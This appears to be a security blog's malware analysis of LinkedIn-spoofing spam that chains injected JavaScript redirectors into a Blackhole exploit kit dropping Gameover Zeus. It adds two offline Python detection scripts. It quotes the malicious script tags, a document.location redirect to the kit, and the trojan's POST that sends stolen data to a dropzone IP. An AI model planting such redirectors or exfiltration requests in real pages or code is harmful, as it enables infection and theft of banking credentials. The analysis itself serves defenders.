More LinkedIn Spam

The spam cannons fired early this morning, signaling the start of another work week. Today, 2012-03-19, we saw another round of spam spoofing notification e-mails from LinkedIn. One observed sample had the subject line “LinkedIn Invitation from your colleague.” Other observed subject lines were as follows:

  • LinkedIn private message
  • LinkedIn Reminder
  • LinkedIn Notification
  • LinkedIn Invitation from your c0-worker
  • LinkedIn Notification service message

The spam sample we analyzed contained a malicious link to kanaryam1907.com/PS74EAtf/index.html. That landing page loaded the following malicious JavaScript redirectors:

<script type="text/javascript" src="http://anwaralsham-sd.com/fEynoZZJ/js.js"></script>
<script type="text/javascript" src="http://core3s.org/VD2EZfxH/js.js"></script>
<script type="text/javascript" src="http://bax98.us/tD6s1rLp/js.js"></script>
<script type="text/javascript" src="http://centrovetaveiro.com/dZ6Ps215/js.js"></script>

Each of the redirector scripts contained the following document.location assignment:

document.location='http://85.114.130.196:8080/showthread.php?t=73a07bcb51f4be71';

This document.location assignment redirected victims to a Blackhole exploit kit landing page at 85.114.130.196:8080. The kit dropped a Gameover Zeus banking trojan with the following properties:

Size: 285208
MD5: BFE53CA58B226DB64542815630A9561C
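The redirect chain above (landing page, four external js.js files, one document.location hop into the exploit kit) is the kind of thing worth pulling out of a captured page automatically rather than by eye. The following is an added example, not code from the original post: it extracts the external script sources from a constructed copy of the landing page, extracts the document.location target from the redirector body quoted above, and flags targets that point at a bare IP on a non-standard port. The URLs come from the post; the helper names, the "suspicious target" rules and the `showthread.php?t=` path shape (taken from this one sample, not a general Blackhole signature) are assumptions. Fetching is stubbed with a callable so the script runs offline.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Landing page URL named in the post.
LANDING_URL = "http://kanaryam1907.com/PS74EAtf/index.html"

# Constructed copy of the landing page: the four <script src> tags quoted in the post.
LANDING_HTML = """<html><body>
<script type="text/javascript" src="http://anwaralsham-sd.com/fEynoZZJ/js.js"></script>
<script type="text/javascript" src="http://core3s.org/VD2EZfxH/js.js"></script>
<script type="text/javascript" src="http://bax98.us/tD6s1rLp/js.js"></script>
<script type="text/javascript" src="http://centrovetaveiro.com/dZ6Ps215/js.js"></script>
</body></html>"""

# Constructed body of each js.js, as quoted in the post.
REDIRECTOR_JS = (
    "document.location='http://85.114.130.196:8080/showthread.php?t=73a07bcb51f4be71';"
)

# Path shape of the exploit kit landing URL in this sample (assumption: derived
# from this one observation, not a general signature).
KIT_LANDING_PATH_RE = re.compile(r"^/showthread\.php$")

# document.location / window.location assignments to a quoted string.
LOCATION_RE = re.compile(
    r"""(?:document|window)\.location(?:\.href)?\s*=\s*(['"])(.*?)\1""", re.S
)


class ScriptSrcExtractor(HTMLParser):
    """Collect the src attribute of every <script> start tag."""

    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            for name, value in attrs:
                if name.lower() == "src" and value:
                    self.sources.append(value)


def extract_script_sources(html):
    parser = ScriptSrcExtractor()
    parser.feed(html)
    return parser.sources


def extract_location_redirects(js):
    """Return every URL assigned to document.location / window.location."""
    return [m.group(2) for m in LOCATION_RE.finditer(js)]


def is_suspicious_target(url):
    """Heuristic (assumption): bare IP host, non-default port, or the kit path shape."""
    u = urlparse(url)
    host = u.hostname or ""
    bare_ip = re.fullmatch(r"\d{1,3}(?:\.\d{1,3}){3}", host) is not None
    odd_port = u.port not in (None, 80, 443)
    kit_path = KIT_LANDING_PATH_RE.match(u.path) is not None and "t=" in u.query
    return bare_ip or odd_port or kit_path


def trace_redirect_chain(landing_url, landing_html, fetch_js):
    """Build the hop list [(stage, url), ...] for one landing page.

    fetch_js(url) returns the body of an external script; here it is a stub so
    nothing is fetched. In practice this would be a sandboxed fetch.
    """
    chain = [("landing", landing_url)]
    for src in extract_script_sources(landing_html):
        chain.append(("script", src))
        for target in extract_location_redirects(fetch_js(src)):
            chain.append(("redirect", target))
    return chain


def final_targets(chain):
    """Unique redirect destinations, in first-seen order."""
    seen = []
    for stage, url in chain:
        if stage == "redirect" and url not in seen:
            seen.append(url)
    return seen


if __name__ == "__main__":
    hops = trace_redirect_chain(LANDING_URL, LANDING_HTML, lambda src: REDIRECTOR_JS)
    for stage, url in hops:
        flag = " [suspicious]" if is_suspicious_target(url) else ""
        print(f"{stage:8s} {url}{flag}")
```

All four script hosts here point at the same exploit kit URL, which is why the final-target list collapses to one entry; the redundancy is there so the chain survives any one of the compromised hosts being cleaned up.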

This Gameover Zeus variant had a bot ID of mmz19 and sent stolen data to a dropzone at 84.32.108.54 on TCP port 15025 via the following POST request:

POST /index.php HTTP/1.1
Accept: */*
Accept-Language: en-us
Cookie: cid=3005
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)
Host: 84.32.108.54:15025
Content-Length: 295
Connection: Keep-Alive
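Several things in that beacon stand out on their own: a POST straight to a bare IP, a port nobody serves HTTP on, a cookie that is nothing but a numeric `cid`, and an MSIE 6.0 / InfoPath.2 User-Agent. The following is an added detection example, not code from the original post. It parses raw HTTP requests (the dropzone POST quoted above, headers only since the 295-byte body is not shown in the post, plus a constructed benign request for contrast), runs a handful of indicator checks over each, and flags a request when enough of them fire. The indicator names, the threshold and the benign sample are assumptions; the Zeus request text is from the post.

```python
import re
from ipaddress import ip_address

# Constructed sample: the dropzone POST quoted in the post (headers only).
ZEUS_POST = (
    "POST /index.php HTTP/1.1\r\n"
    "Accept: */*\r\n"
    "Accept-Language: en-us\r\n"
    "Cookie: cid=3005\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)\r\n"
    "Host: 84.32.108.54:15025\r\n"
    "Content-Length: 295\r\n"
    "Connection: Keep-Alive\r\n"
    "\r\n"
)

# Constructed benign request for contrast: hostname, default port, referer, ordinary cookie.
BENIGN_POST = (
    "POST /index.php HTTP/1.1\r\n"
    "Host: www.example.com\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:10.0) Gecko/20100101 Firefox/10.0\r\n"
    "Referer: http://www.example.com/form\r\n"
    "Cookie: session=abc123; lang=en\r\n"
    "Content-Length: 42\r\n"
    "\r\n"
)

# Assumed threshold: how many indicators must fire before a request is flagged.
THRESHOLD = 3


def parse_request(raw):
    """Split a raw HTTP/1.1 request into method, path, lower-cased headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "headers": headers, "body": body}


def split_host(host_header):
    """Return (host, port) from a Host header; port is None when absent."""
    host, _, port = host_header.partition(":")
    return host, (int(port) if port.isdigit() else None)


def is_bare_ip(host):
    try:
        ip_address(host)
        return True
    except ValueError:
        return False


def beacon_indicators(req):
    """Names of the (assumed) heuristics that fire on one parsed request."""
    h = req["headers"]
    host, port = split_host(h.get("host", ""))
    hits = []
    if req["method"] == "POST" and is_bare_ip(host):
        hits.append("post_to_bare_ip_host")
    if port not in (None, 80, 443):
        hits.append("nonstandard_port")
    if re.fullmatch(r"cid=\d+", h.get("cookie", "")):
        hits.append("cid_only_cookie")
    if "MSIE 6.0" in h.get("user-agent", ""):
        hits.append("msie6_user_agent")
    if req["method"] == "POST" and "referer" not in h:
        hits.append("post_without_referer")
    return hits


def is_gameover_beacon(req, threshold=THRESHOLD):
    return len(beacon_indicators(req)) >= threshold


def scan_requests(raws, threshold=THRESHOLD):
    """Run the heuristics over raw requests; return [(host, port, hits)] for flagged ones."""
    flagged = []
    for raw in raws:
        req = parse_request(raw)
        hits = beacon_indicators(req)
        if len(hits) >= threshold:
            host, port = split_host(req["headers"].get("host", ""))
            flagged.append((host, port, hits))
    return flagged


if __name__ == "__main__":
    for host, port, hits in scan_requests([ZEUS_POST, BENIGN_POST]):
        print(f"flagged {host}:{port} -> {', '.join(hits)}")
```

No single indicator is safe to alert on by itself: MSIE 6.0 was still a legitimate User-Agent on XP desktops in 2012, and plenty of internal tools POST to IP addresses. The aggregate is what separates this beacon from background traffic, and the cheapest confirmation is an egress log check for any connection to 84.32.108.54 on port 15025.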

Note that last week we saw the same LinkedIn spam template used to drop Bugat/Feodo; see our previous post 'LinkedIn Notification' on 2012-03-16. The reuse of the same template to drop both Bugat/Feodo and Gameover Zeus is probably not a coincidence.
